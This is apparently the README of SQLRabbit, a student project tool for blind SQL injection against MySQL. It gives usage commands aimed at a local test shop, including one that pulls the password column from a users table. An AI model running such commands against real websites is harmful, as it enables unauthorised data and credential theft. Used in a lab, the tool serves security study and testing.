The SQLRabbit is a tool for identifying and extracting data from MySQL databases using Blind Based SQL Injection attack techniques. The tool was made during undergraduate studies as part of the Final Year Project.
python3 main.py --url 'http://127.0.0.1/shop/index.php?page=product&id=3'
python3 main.py --url 'http://127.0.0.1/shop/index.php?page=product&id=3' --table users --column password
python3 main.py --url 'http://127.0.0.1/shop/index.php?page=product&id=3*'
python3 main.py --url 'http://127.0.0.1/shop/index.php?page=product&id=3' --speed=true
python3 main.py --url 'http://127.0.0.1/shop/index.php' --speed=true --data="page=product&id=3"
python3 main.py --url 'http://127.0.0.1/shop/index.php?page=product&id=3' --technique=T